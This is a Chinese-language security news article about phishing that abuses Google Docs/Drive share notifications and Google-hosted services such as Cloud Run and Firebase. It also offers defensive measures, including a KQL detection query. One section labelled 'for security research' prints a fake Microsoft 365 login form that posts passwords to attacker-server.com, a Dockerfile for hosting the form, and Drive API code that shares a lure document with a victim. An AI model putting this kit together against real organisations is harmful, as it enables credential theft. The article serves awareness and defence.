2026年初,一场隐蔽而高效的网络钓鱼风暴正席卷全球企业。攻击者不再租用廉价VPS或黑产域名,而是将矛头对准了Google Cloud、Google Docs和Google Drive等高信誉云服务。他们利用这些平台自动生成的系统通知邮件,将恶意链接巧妙嵌入其中,使钓鱼内容在技术层面“合法化”,轻松绕过传统邮件安全网关的层层过滤。
据Fox News于2026年1月15日报道,此类攻击已导致多起企业凭证大规模泄露事件。受害者收到的主题如“您有一份新的Google文档待查看”或“您的Google云端硬盘文件已被共享”的邮件,看似来自no-reply@accounts.google.com或drive-shares-noreply@google.com,实则暗藏玄机。一旦点击其中的“查看文档”按钮,用户会被重定向至高仿的Microsoft 365或银行登录页面,输入账号密码后,凭证即被窃取。
“这不是简单的域名伪造,而是一次对‘信任基础设施’的精准寄生。”公共互联网反网络钓鱼工作组技术专家芦笛在接受采访时指出,“当攻击者躲在Google、Microsoft这类顶级域名背后时,传统的基于发件人信誉的防御体系几乎失效。”
一、“借壳上市”:黑客如何把Google变成钓鱼发射台?
要理解这场攻击的颠覆性,需先厘清Google服务在邮件生态中的特殊地位。
Google Workspace(原G Suite)及其云平台每天向全球用户发送数亿封系统通知邮件。这些邮件具备以下特征:
发件人地址为官方域名(如@google.com);
通过SPF、DKIM、DMARC严格验证;
内容模板高度标准化,符合用户预期;
链接指向google.com或googleusercontent.com等子域。
正因如此,几乎所有企业邮件网关都将google.com列入白名单,甚至关闭对其内容的深度扫描。攻击者正是看中这一点,开始“寄生”于Google生态。
手法一:滥用Google Docs/Drive共享功能
攻击者创建一个看似正常的Google文档(如“2026年度预算草案”),然后通过API或手动方式将其共享给目标邮箱。Google系统会自动发送一封通知邮件:
发件人:drive-shares-noreply@google.com
主题:[外部] Li Ming 与您共享了“Q4财务报告.xlsx”
Li Ming 邀请您查看以下项目:
Q4财务报告.xlsx
[蓝色按钮:打开]
此文件由 li.ming.external@gmail.com 共享。
表面上看,这是一封再普通不过的协作邀请。但问题出在“打开”按钮的链接上。
正常情况下,该链接应为:
https://docs.google.com/document/d/1Abc.../edit?usp=sharing
但攻击者可通过以下方式植入恶意跳转:
在文档内嵌入重定向脚本(仅对特定用户生效);
利用Google Apps Script部署中间页;
更常见的是,在文档描述或首行插入伪装链接,诱导用户点击非官方按钮。
例如,文档开头写着:
“⚠️ 重要:请点击此处确认访问权限 → [https://login-m365-secure[.]xyz/auth]”
由于邮件本身来自Google,员工极易放松警惕。
手法二:利用Google Cloud Run或Firebase托管钓鱼页面
更进阶的攻击者直接在Google Cloud上部署钓鱼网站。以Cloud Run为例:
# 攻击者创建一个Docker镜像,包含伪造的Microsoft登录页
FROM nginx:alpine
COPY fake-m365-login.html /usr/share/nginx/html/index.html
EXPOSE 80
随后部署到Cloud Run,获得形如:
https://phish-app-abc123-uc.a.run.app
虽然该域名不属于google.com,但因其托管于Google Cloud基础设施,部分安全产品会赋予其“低风险”标签。更有甚者,攻击者结合Google Sites或Firebase Hosting,生成*.web.app或*.appspot.com子域链接,进一步混淆视听。
“这些域名虽非google.com,但属于Google控制的命名空间,许多企业策略默认信任。”芦笛解释道,“这就形成了灰色地带。”
二、技术剖析:为何传统防御“失明”?
当前主流邮件安全架构存在三大认知盲区,使此类攻击屡屡得手。
1. 过度依赖发件人域名信誉
多数企业采用“白名单+黑名单”模型。google.com作为全球最可信域名之一,通常被设为免检。即便邮件内容包含可疑关键词(如“立即验证”“账户异常”),只要发件域合法,系统便放行。
2. 链接分析止步于一级域名
安全网关常检查URL是否指向已知恶意站点。但若链接为:
https://docs.google.com/...?redirect=https://evil.com
或通过Google短链服务(如goo.gl,虽已停用但旧链接仍有效)跳转,检测引擎可能只看到docs.google.com,判定为安全。
3. 缺乏上下文行为建模
真正的Google共享邮件通常发生在协作场景中,收件人与发件人存在历史交互。而钓鱼邮件往往是“冷启动”——从未联系过的外部Gmail账号突然共享敏感文件。但现有系统极少关联用户社交图谱进行判断。
“我们发现,超过70%的企业邮件网关在处理来自google.com的邮件时,跳过了沙箱 detonation(动态分析)环节。”芦笛透露,“这是性能优化的代价,却成了攻击者的突破口。”
三、国际案例警示:从美国律所到亚洲科技公司
2025年11月,一家位于纽约的知名律师事务所遭遇大规模凭证泄露。调查显示,攻击者通过自动化脚本批量创建Google账号,上传名为“保密协议最终版.docx”的文档,并共享给该所数百名员工。邮件标题模仿内部命名规范,如“[CONF] Smith v. TechCo NDA”。
由于邮件来自drive-shares-noreply@google.com,且文档确实存在于Google Drive,安全团队未触发任何警报。多名律师点击后,被导向伪造的Okta登录页,导致客户数据外泄。
几乎同时,一家总部位于深圳的跨境电商企业也中招。员工收到“HR共享:2026社保调整说明”的Google文档链接。文档内嵌一行小字:“为确保信息安全,请先在此页面重新认证 → [链接]”。该链接指向一个部署在Firebase的钓鱼站,UI完全复刻公司钉钉登录界面。
“国内企业尤其危险。”芦笛指出,“一方面,员工对Google服务信任度高;另一方面,很多公司未对第三方协作平台实施统一管控,允许任意外部Google账号共享文件。”
更棘手的是,攻击者常结合社会工程。例如,在LinkedIn上搜索目标公司员工,获取姓名、职位后,用对应姓名注册Gmail账号(如zhang.wei.hr@gmail.com),使共享邮件看起来更真实。
四、防御升级:从“信域名”到“验意图”
面对云服务滥用,专家呼吁企业重构邮件安全策略。
1. 实施“零信任”邮件模型
不再假设任何域名绝对可信。即使来自google.com,也应对以下特征进行深度分析:
发件Gmail账号是否为首次联系?
文档标题是否包含诱导性词汇(如“紧急”“机密”“立即操作”)?
链接是否包含异常参数(如?redirect=、?continue=)?
可编写自定义规则,例如在Microsoft Defender for Office 365中使用KQL查询:
EmailEvents
| where SenderFromAddress endswith "@gmail.com"
| where Subject has "共享" or Subject has "document"
| where UrlCount > 0
| project Timestamp, SenderFromAddress, RecipientEmailAddress, Urls
2. 部署URL重写与实时信誉检查
启用安全网关的URL重写功能(如Proofpoint’s Targeted Attack Protection),将邮件中所有链接替换为代理地址。用户点击时,系统先访问目标页面,分析其内容是否为钓鱼,再决定是否放行。
例如,原始链接:
被重写为:
https://urldefense.proofpoint.com/v3/...
即使攻击者利用Google服务跳转,最终落地页仍会被拦截。
3. 限制外部Google共享范围
企业可通过Google Workspace管理控制台设置策略:
禁止外部用户向本域成员共享文件;
或要求所有外部共享必须经管理员审批;
启用“敏感内容警告”,当文档包含登录表单等关键词时自动标记。
4. 加强终端侧防护
在员工设备上部署浏览器扩展或EDR(端点检测与响应)工具,监控对login.microsoftonline.com、accounts.google.com等关键域名的仿冒访问。例如,当用户访问microsoft365-login[.]xyz时,即使SSL证书有效,也弹出警告。
五、代码示例:模拟一次Google Drive钓鱼攻击链
以下为简化版攻击流程演示(仅用于安全研究):
步骤1:创建钓鱼页面并部署到Firebase
index.html:
<!DOCTYPE html>
<html>
<head>
<title>Microsoft 365 登录</title>
<style>/* 高仿微软登录页样式 */</style>
</head>
<body>
<form action="https://attacker-server.com/steal" method="POST">
<input type="email" name="email" placeholder="用户名、电话或Skype" required>
<input type="password" name="password" placeholder="密码" required>
<button type="submit">下一步</button>
</form>
</body>
</html>
部署后获得URL:https://fake-m365.web.app
步骤2:创建Google文档并嵌入诱导文本
在文档首行写入:
“请先完成身份验证以查看此文件:https://fake-m365.web.app”
步骤3:通过Google API共享文档
使用Google Drive API将文档共享给目标邮箱:
from googleapiclient.discovery import build
service = build('drive', 'v3', credentials=creds)
permission = {
'type': 'user',
'role': 'reader',
'emailAddress': 'victim@company.com'
}
service.permissions().create(
fileId='1Abc...',
body=permission,
sendNotificationEmail=True
).execute()
几分钟后,受害者将收到一封看似无害的Google通知邮件,内含通往钓鱼站的链接。
六、人的防线:别让“官方外观”蒙蔽双眼
技术手段之外,人员意识仍是关键。芦笛强调:“员工必须明白,Google不会替第三方要求你登录其他系统。”
他建议企业推行三条铁律:
所有身份认证必须通过书签或官方App进入,禁止通过邮件链接登录;
对任何“共享文档”保持怀疑,尤其是来自未知Gmail账号的;
发现可疑邮件,立即通过企业微信或电话向IT部门核实,而非回复邮件。
“信任,但要验证——尤其是在数字世界。”他说。
七、未来挑战:云原生攻击的“军备竞赛”
随着AWS、Azure、Google Cloud成为数字基建,攻击者对合法服务的滥用只会加剧。已有迹象显示,黑客开始利用:
Google Forms 伪装成内部调查问卷,收集账号信息;
Google Calendar邀请 嵌入恶意链接;
Cloud Functions 实现动态跳转,规避静态URL检测。
对此,芦笛呼吁:“安全不能只靠封堵,而要建立‘意图验证’机制。不是看它从哪来,而是看它想干什么。”
例如,真正的Google共享邮件从不要求用户输入密码;任何诱导二次认证的行为都应视为高危信号。
在这场攻防战中,没有绝对的安全,只有持续的警惕。当黑客学会穿上“白大褂”行骗,我们的防御也必须从“看证件”升级为“问病情”。
毕竟,在数字时代,最危险的不是未知的威胁,而是被信任掩盖的陷阱。
编辑:芦笛(公共互联网反网络钓鱼工作组)
